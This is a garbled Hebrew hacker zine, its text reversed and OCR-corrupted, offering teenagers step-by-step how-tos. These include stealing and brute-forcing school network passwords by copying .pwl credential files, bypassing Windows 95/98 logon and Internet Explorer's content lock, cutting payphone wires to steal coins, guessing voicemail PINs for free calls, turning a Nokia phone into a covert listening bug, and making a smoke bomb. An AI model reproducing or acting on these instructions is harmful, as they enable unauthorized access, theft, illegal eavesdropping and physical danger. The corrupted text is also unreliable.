וא ( םינותחתב םש טקסידה תא איצומ תא טקסידל תואמסיסה לש םיצבקה תא קיתעמ הז
. עשפמ ףח התאו סודה ןולח תא רגוס )) חונ רתויש הפא( סיכב
בלשל רובע% 2
ל הנגה םש ןיידזמה תשרה יארחאו דבוע אל הז םא Run דחא שיש עדוי אל אוה לבא(
ול םיארוקש 6ld!hacker ל סנכ ) ,nternet 'Ilorer בותכ רתא בותכל םוקמבו
&h<co44and%co4
טקסיד סינכת
%חל
coI) ch<windows<i%Iwl a $
בלשל רובע% 2
%חלו בשחמה תא חתפ זא ינממ םכח רתוי אוהש בשוחו ידימ רתוי יתיא קחשמ יארחאה םאו -.
. הב רחבו הלבט עיפותש דע 4s!dos Iro4I
בותכו
coI) ch<windows<i%Iwl a $
בלשל רובע% 2
' ןורתפ שי הז תא םג םסוחו םכב הרגתמ שממ אוהו הז תא םג םסח אוה םאו
+3
הזיא הנשמ אל תיבב הלעפה טקסיד וניכה ;= ) ;. ) M .
$ #כ הז תא םישוע
יע סוד ןולחל םיסנכנ
Run j co44and j s)s a $
... ותוא םיסינכמו ןוכיתל םיכלוה
הזכ #סמ עיפויש דע תצק םיקחמ
MicrosoQtXRY 8indows ;.
&oI)right MicrosoQt &orI +;.+!+;;. .
/ & )$
םיבתוכו
coI) ch<windows<i%Iwl a $
• בלשל םירבועו 9
ב יתיא רשק ורצ אנא חילצמ אל הז םאו icO +*J.3J3J3
לייאמ ייאב וא oldhackerknew4ail%net
. וחילצתש חיטבמ ינא ' תוטיש דוע םכל ריבסא ינאו
בלש 2
אלא םינכסמ םידימלתכ אל תרשל רבחתהלו תישעמה הצירפה תא תושעל #יא ריבסי ינא וישכע
כ בורל . םירומה לש תונכותב םינויצה תא תונשל #כו . תשרה ילהנמכ ;;l להנמ לש תואמסיסה
הלא תונכותל ןיא בורל םג ( היעב םכל היהי אל זא םינויצה תנכות לש תואמסיס םתוא םה תשרה
. ) ילש ןוכיתב הז #כ -אמסיס
#יא ריבסי ינא ןיזגמה #שמהב (... השק םידומיל םוי ירחא םיחמש טקסידה םע התיבה םיעיגמ
. ) לקו ףיכ ותוא תושעל
ל םיסנכנו windows הלאה םיצבקה תא םש שי בורל םיאורו טקסידב שיש ללשה תא םיחתופו
$ םימוד םיצבק וא
Guest%Iwl or student%Iwl
"d4in%Iwl
איה ילע תפדעומה הנכותה ' התוא חצפל ידכ הנכות #ירצו תנפצומ אמסיס הנשי ולא םיצבקב
&ain . ילש רתאב תודרוהה תניפב דירוהל רשפאו
httIh//Qreehost+.%websa4ba%co4/ra(or
ל םיכלוהו הילא םיסנכנ
-ile j add to list
הלועפה #כו קסיד דראהל םיצבקה תא טילקהל ףידע ( םדוק םתקתעהש םיצבקה תא םיפיסומו
. ) הברהב הריהמ היהת
ב םדוק םיקדוב &onQigure הש 0 לע דמוע Brute Qorce attack .
םיצחולו ינמיה רותפכה םע תשרה להנמ לש %בוקה לע םיצחול "ttack .
לכ םג תויהל לוכי ןמז חקיי הז ' %ורפל הסנת הנכותהו בלכה םע לייטל וא הלוק תותשל וכל
. הלילה
םש לש שמתשמ םשה םע םיסנכנו ןוכיתל םיכלוה םתא אמסיסה תא םתאצמ םתאש ירחא
... תשרב םינכשה לכו םכינפב חותפ בשחמה לכו אמסיסה םעו תשרה להנמ לש %בוקה
ל עצוממה תא םכל ונשתו םינויצה תנכות תא ואצמת -הלק הדובעה וישכע ;!+* הדות ודיגתו
ל הבר 6ld!hacker הילא %ורפל לק #כ-לכש תכרעמ השעש הלעפה תכרעמ השעש סטייג לייבל וא
.
By Old-Hacker ¡I.C.F &
+:
ש תואסרגה לכ היקונ לש םינופאלפב םניח תוחי
ל ןוכנ ' חוטב דבוע הז םוקלס תשרבו הז תא יתקדב N לירפאב 9**+ .
'גנרואב הז תא תוסנל ידכ
וראשית אלש דבוע הז הטיש וזיא לע ריבסא ינא םדוק הככ זא בוט 7a4er םי
. . המל םיעדוי אלו תושעל םיעדוי קרש
... ףסכ םכל הלוע אל הז שא יבכמלו סנלובמאו הרטשמל םירשקתמ םתאשכ
התאשכ הככו #לש רבח לש רפסמ אוה הרטשמה לש רפסמהש רישכמב תנכתל רשפא זא
. ףסכ #ל הלוע אל הז הככו הרטשמל רשקתמ התאש בשוח רישכמה רבחל רשקתמ
+ % אוהש יאנכט דוק םיבתוכ
0 m+93:=m3**+
ה תא םישיקמ 3 ןימיל לאמשמ & ןושאר
9 % ל טירפתב םיכלוה 4ergenc) Nu4bers
• ( שא יבכמו סנלובמא! לארשיב הרטשמה לש םירפסמ םש ויהי +** ! +*+ ! +*9 )
3 % . םניח וילא רשקתהל םיצור םתאש רפסמל םוריחה ירפסמ תא םינשמו
: % . רישכמה תא םיבכמ
= % & תצק םיכחמ +* ) 9* . תוינש
J % . םתבתכש םירפסמה תא גייחל םיסנמו םיקילדמ
N ב םכתבתכש םירפסמה דחא תא םיבתוכ םתא ' דבוע לכה םא. 4ergenc) Nu4bers לעו
$ האבה העדוהה עיפות רישכמה "tte4Iing 4ergenc) &all
. םוריח תחיש םוזיל הסנמ תירבעב וא
... ישפוח ורבדת ! םניח תוחיש םכל שי ... והזו
תוחיש ירפסמ יוניש ' ןורקיע ותוא לע ' םינופלטה יגוס לכ םע רבד ותוא תא תושעל רשפא
החלצהב . םוריח
By Old-Hacker ¡I.C.F &
` הז לע ולע םוקלס - רמאמה תאxוה ןמזל דבוע אל`
+=
רפסה תיבב תושעל יאדכ המ
. תוטיש המכ םכל יתאבה הרגשהמ תאצל ידכ םתס לבא ) הדומ ינא ( קופד תצק טסקט הז
םכל ןתא ינא ++ . רתויב חלצומל רתויב עורגהמ סהיבמ תואנהל תוטיש
++ )...חחח(.דומלל .
+* ... םק אלו העש יצח הזיאל בשייתמ אוה זאו אסיכה לע קבד אב אוהש ינפל הרומל םישל .
; אל אוהו שארה לע ול לופיי יל'גה התיכל סנכי הרומהשכ זאו הרקתה לע ליעגמ יל'ג קיבדהל.
. בל םישי
. . קיחצמ םגו חוטב יכה ' הרומה לש בגה לע קתפ םישל.
N . יטיפרגב תותלדה לע םיתורישב בותכל.
J . םויה תליחתב םירומ רדחל קורזלו ןוחרס תצצפ איבהל.
= לכ תא דירוהל םויה תליחתב תולסאל ותוא סינכהלו םיתורישהמ טלאוט ריינה תא איצוהל.
ב אובלו םימה = . ןוכית אלו םוירווקא תוארלו הנומשל
: . ) םצעב אל הז ילוא (. קיחצמ שממ ... םיצולפ ןולב הרומל םישל.
3 ב םתוא םירכומש הלאה םינטקה םיצפנה תא תחקל. =* ל 3 ןמויל תחתמ םתוא םישלו ' לקש
אוה בוט הרקמב(. םלה לבקי אוה זאו םיצפנה לע ןמויה תא קופדיו אובי הרומה ! התיכה לש
.)הפי אל...םתס-שריח היהי
9 רוזחי אוהש םיבייח םתאש דיגהלו דלי הזיא לש םירוהה םתא וליאכ תושעלו סהיבל ןפלטל .
וא( . ... המל עדי אלו התיבה עיגי אוהו ותוא ררחשת הריכזמה -... יתחפשמ עוריא ללגב התיבה
.) דומלל חוכ םכל ןיאשכ םכל הז תא תושעל
+ .
הצצפ יכה רבדה
םוקמב זא ' ...ףוחד הזו יתחפשמ עוריא ללגב הזש דיגהלו #יחאל ןפלטל שקבלו תוריכזמל תכלל
סהיבל רשקתמש ימ לכ זאו ... יטורא רפסמל ירחא בוקע ןופלטל השעת #יחאל רשקתהל
)ןותיע ףוס לכב גישהל רשפא םירפסמה תא( חחחח&יטורא רפסמל עיגה אוהש בשוחו וב שייבתמ
.
B) 6ld!Hacker
+J
וחיש םירכל לע םידבועש םינופלב םניח ת
לבקל ידכ אנייבוג תורישב שמתשהלו קזנ תא ןייזל #יא םכתא דמלי ינא תעכ
. תיבב ןופלטל ייב ודיגת םתא הזה קרפה תא וארקתש ירחא' . םניח תוחיש
: םיכרצמ
+ לש לילצ . &oin &ollet . ילש רתאב תודרוהה תניפב דירוהל רשפא '
9 תוינזוא .
3 )ןמקסיד)ןמקוו . MI3Pla)er תא ותייא עימשהל רשפאש רבד לכ רוציקב ' קסיד ינימ )
חילצה אל דחא ףא' קוחצב ' לילצה תא קורשל ןמאתהל וסנת ' םידחוימ םישנאל (. דנואסה
. ) חילצי אלו
הצירפה
לילצה תא ) ןמקוו לשמל( הטלקהה רישכמ לע תיבב םיטילקמ לכ םדוק
םיגייחמו ירוביצ ןופלטל םיכלוה כחא
142
ןופלטל תוינזואה תא םידימצמ
םיכחמ 2 ) 3 סינכתש #ממ שקבמש ןיירק שיו ןופלטל לילצה תא םיעמשמו םינועש ירחא תוינש
. אמסיס
$ תואבה תוירשפאהמ דחא איה אמסיסה
0000001
0000002
0000003
0000004
0000005
0000006
0000007
0000008
0000009
00000010
. לאמשמ םיליחתמ
. הנתשמ החיש לכ ירחא אמסיסה0
לכ תא וסנת 10 . םכל אבש ןאל וגייחתו וק לש לילצ ועמשת אמסיסה תא ולגתשכו תוירשפאה
.םניח ןופלט וישכע םכל שי
By Old-Hacker ¡I.C.F &
+N
ןשע תצצפ
"" ןשע תצצפ ןיכהל #יא וישכע םכתא דמלא ינא
: םירמוח
) שלח ןוטרק ףידע( תרבחמה לש ןוטרקה
קבד
לוח
3 םירורפג תואספוק
קבד ריינ
ריינ
הנכה תוארוה
...םתס ' הרוצה תא הל םיקרפמו תרבחמ 'ת םיחקול
+ . עבורמ םיכתוחו ןוטרקה תא םיחקול .
9 רבד ריינ םע םיקיבדמ
3 )םיריאשמ דחא רורפג( םתוא םיקרפמו םירורפגה לש םישארה תא םיחקול.
3 .םירורפגה ישאר תא הילא םיכפוש ! הסיע תאזכ אצויו םיבברעמ לוחו קבד םיחקול.
: #רעב םיאצומו הלחתהל ןוטרקה ףוסמ ותוא םימשו #ורא ריינ םיאבמ. 3 .ןוטרקהמ מס
= . לילג לכהמ םישוע.
J רתוי ומישת םא ... )...הברה(ןשע שי - ראשנש רורפגה םע %וחב ראשנש ריינה תא םיקילדמ .
. ןשע רתוי היהי םירורפג

$ רויא
תאצל רומא #רעב הככ
111111111111111111111111111111
000002020200200202020202
000000020202020202020202
///////////////////////////////////////////
000220020202002020020202
1111000021202022022020221
. בוט קלדייש ידכ ' קבדמ םירורפג ישאר רתוי םישל ידכ הלחתהב
$ ארקמ
.לילג & 1
. לוחהו קבדה לש הסיע & 2
. םירורפג ישאר&0
ריינ & ///
By Old-Hacker ¡I.C.F ¡
+.
תואמסיס תצירפ Windows95/98
.ןגומ אל םכלש סודניווהש המכ םכל תוארהל ידכ תאזה הבתכה תא יתבתכ
!הבתכה תא אורקל רבכ ורמגתשכ !תוקד הרשע שמח !רשע דועב
!רתוי הברה םכמצע תא !תוחפ הברה םכלש הלעפה תכרעמה תא וכירעת םתא
!בושח יכה לבא .םכל שי אלפנ עדי הזיא םכלש םירבחל תוארהל ולכותו
וילע ןקתומש בשחמ לכל רודחל ולכות 8indows;=/;. .אמסיס םע ןגומ אוה םא וליפא
.תימוקמ !תילקול הצירפ איה תאזה הצירפה - םיליחתמ ונחנאש ינפל דחא רבד קר
םירקמב דואמ ליעי .םירדוח םתא וילאש בשחמל תיזיפ השיג םכל שי םא קר תדבוע איה רמולכ
$םיאבה
'וכו !םירבח !תויונח !םיקנב !םילעפמ !סיב
אמסיס תנגה
.אמסיס םע ןגהל םדוק #ירצ !אמסיסה תא %ורפל #יא םכל תוארהל ידכ !ןושאר רבד
.רשפא יא .םייק אלש והשמ %ורפל רשפא #יא
$םיאבה םידעצה תא ושע !אמסיס תרזעב ןגומ אל דוע םכלש סודניווה םא ןכל
.הרקב חול !תויורשפא !לחתה לע וצחל
.התוא ודילקתו !רוכזל ולכותש אמסיס ורחבת !תואמסיס לע וצחל וישכע
אל אמסיס ובתיכ .אמסיס שקבי סדוניווה !םיאור םתאש ומכ .הלחתהמ בשחמה תא וליחתה
.הנוכנ
.הרק המ
.םעפה הרק המ ...הנוכנה אמסיסה תא ובתיכ וישכע
.ןוכנ !אמסיסה תא תעדל ילב סודניוול סנכיהל רשפא יא !םיאור םתאש ומכ

---&&&&& "ןוכנ אל !אל &&&&&---
אמסיסה תצירפ
.םלוכ תא וסנ אנא !תוטיש המכ הפ םכל הארא ינא
.םייח ושעתו !םיבהוא יכה םתאש וז תא ורחבת כחא
רפסמ הטיש +
הלחתהמ בשחמה תא וליחתה 0
ה רותפכ לע תופיצרב וצחל 0 -= .קיספהל ילב םימעפ הברה
בצמב ליחתי סודינווהש הז הרקיש המ 3aQe Mode
.אמסיס שקבמ וניא ןכלו !סודניווב תולקת ןוקיתל דעונ הז בצמ
!טנרטניאל רבחתהל ולכות אלו !רזומ תצק האריי לכה םנמוא
.לכהל השיג םכל שיו !קלח ודבעי תונכותה לכ לבא
!םימיוסמ טסקט יצבק לע ןגהל אמגודל הדעונ אמסיסה םא
.הלאה םינגומה טסקט ייצבקל תשגל םילוכי םתאו !הבולעה הנגהה תא םתרבש עגרה זא
רפסמ הטיש 9
הלחתהמ בשחמה תא וליחתה 0
ה רותפכ לע תופיצרב וצחל 0 -. .קיספהל ילב םימעפ הברה
+;
ב ורחב .בשחמה תא ליחתהל #יא רוחבל םכל ןתייש טירפת ולבקת םתא &o44and Iro4It
onl)
יע תלעופש הלעפה תכרעמ םצעב הז סוד !ריכמ אלש ימל .סודל סנכיי בשחמהש הז הרקיש המ
.שמתשמהמ תודוקפ
.בושח אל לבא סוד לש ןיערגה לע ססובמ ןורקיעב סודניוו
ה שקמ לע וציחלו האבה הרושה תא ודילקה וישכע nter $
rena4e ch<windows<i%Iwl ch<windows<i%'''
$אבה רבדה הז הפ הרוק םצעבש המ
.אמסיס דילקהל םיכירצ אל םתא זא !ןיידע סודניוול םיסנכנ אל םתאש ןוויכמ
בשחמה #יא זא !סודניוול םיסנכנ ןכ םתאשכ רמולכ !אמסיס דילקהל םיכירצ ןכ םתאשכ !וישכע
אמסיסה םא עדוי
תיתימאה אמסיסל םתבתכ םתאש המ תא הוושמ אוה .דואמ טושפ .אל וא הנוכנ םתבתכש
לע %בוק #ותב תאצמנש
אוה זא !אל םא !הנוכנה אמסיסה הזש עדוי אוה !%בוקבש המל םאות םתבתכש המ םא .בשחמה
.אלש עדוי
תא עדוי אוה זאו !אוהה %בוקה תא חותפל הז תושעל #ירצ רקאהש המ לכ זא #כ םא !וישכע
.ןוכנ !אמסיסה
םיוושמ םהש םעפ לכ רשאכ !תיטמתמ הלועפ יע ותוא וניפצה הז התשע טופוסרקימש המ ןכל
םיצבקה ןיב
!%בוקה ותוא תא וחתפת םא #כ !םיוושמ זאו םתדלקהש המל הלועפה התוא תא םישוע םה
התוא תא ועדת ןכ םא אלא איה המ תעדל ולכות אלו תונבומ אל תויתואב הארית אמסיסה
.#ופה לבא הלועפה התוא תא השועש והשמ ותנכתת זאו תיטמתמ הלועפ
...תיטמתמ הלועפ התוא איה המ תעדל ולכות אלש היעבה
( %בוקה ותוא תא םיחקול ונחנא !הרקמ לכב Iwl ל ותוא םינשמו !). ''' .
$אמגודל !רחא רבד לכל ותוא תונשל ולכות ןכ ומכ

rena4e ch<windows<i%Iwl ch<windows<i%Quk
וכפהת לא אמגודל .%בוקה גוס תא ההזי אל סודניווהש רמולכ .#ויש היהי אל %בוקלש אוה רקיעה
$ל הז תא
eIg הקיפרג - .
giQ הקיפרג - .
b4I הקיפרג - .
t't טסקט #מסמ - .
doc דרוו לש #מסמ - .
IIt טניופ רואפ לש #מסמ - .
4I3 דנואס %בוק - .
waV דנואס %בוק - .
4id דנואס %בוק - .
...ןויערה תא םתטלקש בשוח ינא
.הלחתהמ בשחמה תא וליחתת !וישכע
...םכל אבש אמסיס הזיא דילקהל ולכות #א !אמסיס תשקבמש הביתה תא ולבקת םנמוא םתא
הז +**l לכ ןכלו .תוושהל רומא אוה וילאש %בוקה תא אצומ אל סודניווהש ןוויכמ תאז .דובעי
ודילקתש המ
םוש אצומ אל סודניווה !בושש ןוויכמ תאז !השדח אמסיסכ הז תא לבקי סודניווה .ןוכנ היהי
אמסיס %בוק
םתיצרש המ תושעל םירמוג םתאשכ !וישכע .השדחה אמסיסה תא רשאל ושקבתת ןכלו !בשחמב
!בשחמה םע תושעל
אמסיסה תא םיריזחמ #יא ....םתישעש המ עדי אל דחא ףאש ידכ הנשיה אמסיסה תא וריזחה
.הנשיה
9*
ה שקמ לע וצחל ןכמ רחאלו האבה הרושה תא ודילקהו !סוד ןולח וחתפ nter $
rena4e ch<windows<i%''' ch<windows<Iwl
ל םתיניש םא וא Quk $#כ הז תא ודילקה זא .
rena4e ch<windows<i%Quk ch<windows<Iwl
רפסמ הטיש 3
רפסמ הטיש 3 רפסמ הטיש לע תססובמ 9 .
הלחתהמ בשחמה תא וליחתה 0
ה רותפכ לע תופיצרב וצחל 0 -. .קיספהל ילב םימעפ הברה
ב ורחב .בשחמה תא ליחתהל #יא רוחבל םכל ןתייש טירפת ולבקת םתא &o44and Iro4It
onl)
הטישב ןויערה !וישכע 3 .בשחמה לע םיצבקל השיג גישהל טושפ אלא !סודניוול סנכיהל אל הז
...הרזע תצק הפ ןתא ינא !אלש המל .הנהייש !סוד תא ריכמש ימל
$ודילקה תאז תושעל ידכ !תישארה היירפסב םתאש וקדבת
$) c
ודילקה תישארה היירפסב םתאש וישכע
dir
ודילקה םיצור םתאש םיצבקה םיאצמנ םשש היירפסל סנכיהל ידכ
cd director)
םיארוק היירפסל םא אמגודל KQiles ודילקת זא
cd KQiles
םיארוק היירפסל םאו ga4es ודילקת זא
cd ga4es
ודילקה בוש וישכע
dir
!םלוכ תא םיצור םתא םא .םיצור םתאש םיצבקה תא וקיתעתו םיטקסיד ןנוכל טקסיד וסינכה
ודילקה
$ coI) i%i "
אמגודל !םיוסמ %בוק םיצור םתא םא ga4e%e'e ודילקה
$ coI) ga4e%e'e "
!םוכיסל קרו !תאזה הבתכל ונמייס !והז
הבתכל דע .םעפ דוע ובשחתש יאדכ !םינגומ בשחמב םכלש םיצבקהש םתבשח וישכע דע םא
.האבה
GeHeNoM
9+
ןופלט ירישכממ nסכ בונגל (יא
.רשקתהל רשפא זאו לקש םימשש הלאה םירישכמה תא םיריכמ
.םיסנתמו !#וניח תודסומב !ריעב עוקת םוקמ הזיאב רקיעב םתוא אוצמל רשפא
ולכוי םכיניבש םיטורשה םג ןכל .םיטושפ םירבד המכ קר תכרוצ הזכ ןופלט רישכמ תדידש
.תאז תושעל
.הז תא ורכזת .תונוז ינב םתא .םימטמוטמ ומכ וגהנתת לא !ןושאר רבד
.םכתדובע תא תושעל םישנא אלמ לומ םויה עצמאב ואובת לא !תורחא םילימב וא
םתבנגש םכלש םירבחה לכ ינפל וזירכת לא ןכ ומכ =** ...תמוצב ירוביצ ןופלט הזיאמ לקש
.ולש למשחה יטוחל השיג םכל שיש הזכ ןופלט ואציימ תעכ !בוט
.)רוביח תבית( תמצמה תא וא ריקל דומצ לתפתמש לבכה תא ושפח טושפ
.קוריו םודא .למשח יטוח ינש היהי !ליגר ןופלט וקב !וישכע
!)תויוטשו םיסלופ תרבעה( תרושקתה לועפתל קוריו םודא .העברא ויהי !הזכ גוסמ ןופלטב
.ןיעל טלוב האריי אל #תח ובש לבכב םוקמ ושפח .תועבטמה תקידב ליבשב רוחשו בוהצו
למשחה יטוח תעברא ופשחייש #כ לבכה ןמ קלח תונידעב וכתיחו םכלש ןיכסה תא ופילש
.םיינועבצה
"...ןופלטב שמתשהל תוסנל םישנאל וחינהו בוהצהו רוחשה תא ירמגל וכתיח
.הפ הרוק המ
***********
לש עבטמ אמגודל םימש םתאשכ !ןכבו = ( רביסרה אתב לקש ReceiVer תושעל ידכב רישכמה לש )
!החיש
םיאבה םירבדה תשולשמ דחאש דע םש ראשנו תינמזה תועבטמה תבית #ותל לפונ עבטמה
$םירוק
תבית לא תינמזה תועבטמה תבית #ותמ #לשנ עבטמהו !םתקתינ !םתרביד !םתרשקתה 0
הליגרה תועבטמה
חתפמ םע אב קזב לש #מסומ יאנכטש דע םש ראשנו ןכ ינפל םש ויהש םילקשה לכ תא םש שגופו
...ףסכה לכ תא איצומו !הביתה תא חתופ !דחוימ
לפונ ףדועה !בשוחמ לכה .#ירצ היהש הממ רתוי םתמליש לבא !םקתינ !םתרביד !םתרשקתה 0
!ףדועה תביתל
דע םש ראשנו ןכ ינפל םש ויהש םילקשה לכ תא םש שגופו הליגרה תועבטמה תביתל תיראשהו
יאנכטש
...ףסכה לכ תא איצומו !הביתה תא חתופ !דחוימ חתפמ םע אב קזב לש #מסומ
.םתקתינ זאו !המוד והשמ וא !סופת היהש וא !הנע אל דחא ףא !םתרשקתה 0
.ףדועה את #ותל רשי תינמזה תועבטמה תביתמ לפונ עבטמה םתקתינש עגרב
.הפ ונלש הדידשה ןויער ירוחאמ דמועש דוסה רתוי וא תוחפ הז
העשב םירזוח דואמ טושפ םתא 3h** רוחשה למשחה טוח תא הרזחב םירבחמ !רקוב תונפל
תרפופשה תא םימירמ !והשמ וא פייטולס םע םיקיבדמ !בוהצה למשחה טוח תא ןבומכ םגו
.םיקתנמו !)...ממממממממממממממפב( וק שיש רמואש לילצל םיבישקמו
יפייכה קלחה
3333333333333
"""""םיטרסב ומכ קוידב הצוחה לגלגתהל ליחתי ףסכה
.םיסיכב םוקמ היהיש חוטב אל המל !שארמ תיקש ןיכהל %למומ
הז ילש אישה J+: .)הליל ותואב דחא ןופלטמ רתויב הז תא יתישעש ןבומכ( """דיחי הלילב לקש
$םיפיט המכ
99
.םירוחש םידגב שובלל %למומ 0
.עונפוא םע אובל %למומ 0
.הליעגמו הלוחכ תדיינמ םיאצויש לוחכב םינמש םיאומוה םידמגמ רהזיהל %למומ 0
תצק ול תתל קיזי אל םג .םתס הככ לפנ לכהש ול ודיגת טושפ !םכתא האור והשימ םא 0
...םיזוחא
ראשיי ףסכה !םיטוחה תא םתכתחש ירחא םייתש וא לקש ומישי םישנאשכ $הנורחא הרעה קר
!הנוכמב
...םיליעפ היהי אל תועבטמה תקידב לע םיארחאש םיטוחה יכ !רשקתהל ולכוי אל םג םהו
הרקמל חדקא םע ואובת ןכל .קזב לש יאנכטל אורקל םילולע םה !דואמ םתוא ןבצעי הז םא
.םוריח
.תמאב .םיגרוס ירוחאמ תבשל רשאמ גורהל ףידע
!האבה םעפה דע זא
GeHeNoM
93
ןופאלפהמ ויצ רישכמ תנכה
.אל ינא .דנוב סמיי'ג תא םיבהוא
ירלופופה ןופאלפה יכ אצוי ונכרעש רקסמ !הרקמ לכב
ה אוה םילשורי רוזאב רתויב Nokia =++* .'גנרוא תשר לש
.םישנאל טטצל ולכות ותרזעב רשא !רישכמ ןיכהל םילוכי םתא הזה ןופאלפה םע !ןכבו
ומכ יתימא הנזאה רישכמ שממ אלא !ןופאלפ תשר לש הלרוטומה םע תוחישל טוטיצה ומכ אל הז
.הרטשמה לש
וריאשת !אמגודל .םש םירבדמש לכ תא עומשל רשפא זאו רדחב םוקמ הזיאב ותוא םיאיבחמ
ותוא
םנמא הז .הרוהו הרוה לכל רמוא םכלש הרומה המ קוידב ועמשתו םירוה תפיסא לש םויב התיכב
!יקוח אל
.םינוכנה םירקמל קרו ןוכנ הזב ושמתשתש #כ לע #מוס רתאה תווצ לבא !טרפה שפוח לע רבועו
...והשמ םתדביא זא םירחא םדא ינבל דובכ םכל ןיא םא לבא !קוחה לע ןיז םש אל דחא ףא
$םיאבה םילכה תא םיכירצ םתא םכלש ןופאלפהמ הזכ רישכמ תנכהל !הרקמ לכב
םגדמ ןופאלפ 0 =++* היקונ לש
)סיפדהל %למומ( תאזה הבתכה תא 0
)ריקב שארה תקיפד יע דבוע אוהש קודבל %למומ( םכלש חומה תא 0
בצמב ותוא םישלו יטמוטוא הנעמל ןופאלפה תא רידגהל אוה ושעתש ןושאר רבד תעכ !בוט
.טקש
!ייתוברו ייתוריבג וישכעו
!םהיניב םירבחמ רשאכש !םיניפ םנשי !ןופאלפה תיתחתב .םסקה לכ תא השועש םכחותמה קלחה
.ינמיה ןיפל לאמש דצב יעצמאה ןיפה ןיב ורבח תוריהזבו !למשח טוח וחק .רצק רצוויהל לולע
.'היינזוא' בצמל סנכיי דיימו עקתיי םכלש ןופאלפה הרקיי הזש עגרב
.ןברוקה לש רדחב והשופיא ןופאלפה תא איבחהל אוה תושעל םכילעש לכ תעכ
ןופאלפה לש רפסמל םתבנגש ןופאלפ הזיאמ וא םכלש ןופלטהמ ורשקתהו התיבה וכל וישכע
ותואש
!תסנכנ החיש תאז יכ ףסכ הלוע אלש המ !החישה תא לבקי דימ ןופאלפה .הנזאה רישכמל םתכפה
םתאו
הנזאה רישכמש ורכזת קר .השועו רמוא םכלש ןופאלפה רוזאב אצמנש ימש המ לכ תא ועמשת
רתוי הברה הלוע
קיזי אל !םכלש ןופאלפהמ הזכ רישכמ ןיכהל ידכב הז עדימב םישמתשמ םתא םא ןכלו !ןופאלפמ
וחלשת םא
יל 9** ! 3** .ראודב לקש
!םכלש
GeHeNoM
9:
לש הרוזנצה תמסיס תצירפ Internet Explorer
.ןגומ יכה ןפדפדה אל אוה !ולש תוירלפופהו !ובש םיבוטה םירבדה לכ םע !טפוסורקימ לש ןפדפדה
#כ לכ םתאש טנרטניא ןפדפדה לע תעדל םתיצר שממ אלש והשמ םכל הארא ינא תאזה הבתכב
.םיבהוא
תא םהילא םוסחלו םימיוסמ םירתא רזנצל תורשפאה תמייק טפוסורקימ לש ןפדפדב !עודיש יפכ
.השיגה
!היכרנא !היפרגונרופ ירתאל סנכיהל לכונ םידליה ונחנאש םיצור אלש םירוה(םירומל דעונ רבדה
'וכו
!םהל םירזנצמ אלש םכמ הלאל !םדוק !אמסיסה תנגה תא דירוהל #יא םכל הארא ינאש ינפל לבא
( ןפדפדה תא וחתיפ .ןווכתמ ינא המל הארא קר ינא ,nternet 'Ilorer .)
טירפת לע וצחל #ools
... ב ורחב ,nternet 6Itions
$ןוגכ םיטירפת ינימ לכ םע !חתפיי שדח ןולח General, 3ecurit), &ontent, &onnections !
...דועו
לע וצחל &ontent
ב וננובתה &ontent "dVisor .עגרל
.אמסיס ידי לע קר המיסחה תא דירוהל רשפאו !םירתאל השיג םוסחל דעונ הז
ה רותפכ לע וצחל ןווכתמ ינא המל םכל תוארהל ידכ nable
.ןפדפדה תא ורגס .רוכזל ולכותש אמסיס ומיש .המיסחה תא וליעפתו
.הפי .הרוק המ .םתמסחש רתאל סנכיהל וסנ וישכע .שדחמ ותוא וחתיפ
םתא יכ !התוא םיעדוי ןבומכ םתא .אמסיס םכממ שקבי הז .המיסחה תא דירוהל וסנ וישכע
!התוא םתרחב
.אמסיסה תא וישכע .הלחא .הרוק המ .היוגש אמסיס ודילקה .התוא םיעדוי אל םתא חיננ לבא
ןמזה עיגה וישכע .ולטבת לא לבא .המיסחה תא לטבל םילוכי וישכע םתא םיאור םתאש ומכ
#יא וארתש
!אבה עטקה תא סיפדהל %ילממ ינא .םינכומ .אמסיסה תא תעדל ילב הז תא םיצרופ
.ירטסי'גרה םע .הז תא םישוע קוידב #יא זא .הפ לעב רוכזל לקש והשמ אל הז יכ
8indows Registr)
.ירטסי'גרה הז המ
( סייבאטאד טושפ הז ירטסי'גרה database סודניוובש קנע ) ;=/;. ( N# םצעב אוה
ה יצבק לכ תא ףילחמ IiQ הו . ini סודניווב ונל ויהש היצרופניא יצבק ינימ לכ דועו . 3%++ ו 3%+
( תויורשפאה לכ !תורחא םילימב זא 3ettings וישכע .םש תואצמנ תונכות ינימ לכו !הרמוחה לש )
תא וריכה
- ירטסי'גרה #רוע Regedit תושעל !בשחמב תויעב ןקתל ידכ םא .הברה הזה #רועב ושמשת םתא .
!םירופיש
.ררולפסקא טנרטניא לש הנגהה תמסיס תא %ורפל !אמגודל וא
.ןמז חקול הז יכ !#רועב םישמתשמ #יא דעצ רחא דעצ םכל הארא אל וישכע ינא
.אמסיסה תא %ורפל #יא דעצ רחא דעצ םכל הארא ינא !ןכש המ
אמסיסה תצירפ
$םיאבה םידעצה תא ושע !חותפ ןדפדהשכ
לחתה לע וצחל 0
...הלעפה 0
$ודילקה 0 regedit לע וציחלו nter
$לע הלופכ הציחל וציחל .חתפיי #רועה
9=
H/LP76&"7PM"&H,N !j 36-#8"R !j MicrosoQt !j 8indows !j &urrent
0ersion !j Policies
וילע בותכש והשמ וארת םתא !אמסיס תנגה שי םא .#רועה לש ינימיה ודייצב וננובתה /e) .
ה שקמ לע וציחלו רבכעה םע הז תא ונמס $elete אל רבכ אמסיסה !הז תא םתקחמש רחאל .
.תמייק היהת
ולכות אלש ידכ תאז ....ןבומכ תנפצומ התייה טושפ איה .םינפב התייה אמסיסהש ןוויכמ הז
!איה המ תעדל
תונכות לבא .אמסיסה המ םכל תוארמו יקנ טסקטל הז תא תוכפוהש תונכות תומייק יכ םא
תונתינ אל כדב הלאכ
!םינינועמ תאז לכב םתא םא .םרובע םישקבמש ףסכה תא תווש אל טלחהב םהו !םניחב הצפהל
$אבה רתאה תא וסנ
httIh//www%ntbugtraO%co4
.בוש וילא וסנכיתו !ןפדפדה תא ורגסת !אמסיסה תא םיקחומ םתאש ירחא - הנורחא הרעה קר
חתפנ אוהשכ קר ירטסי'גרב קדוב אוה .אמסיס רתוי ןיאש עדיי ןפדפדהש ידכ הז תא ושעת
.שדחמ
...אמסיס שקביו !םתקחמש עדיי אל אוה !אמסיסה תא םיקחומ םתאשכ חותפ אוה םא ןכל
.תויעב היהי אלו !בוש ותוא וחתפת זאו !ןפדפדה תא ורגס טושפ זא
.והז
!סיבל וכל וישכע
.ישפוח ושלגתו !ןפדפדה לש הנגהה תא ופיעת
!םכלש
GeHeNoM

9J
רכל יסירכב רזוח שומיש
.'ורמגנש טרכלט יסיטרכב שמתשהל #יא ודמלת ת-ע-כ
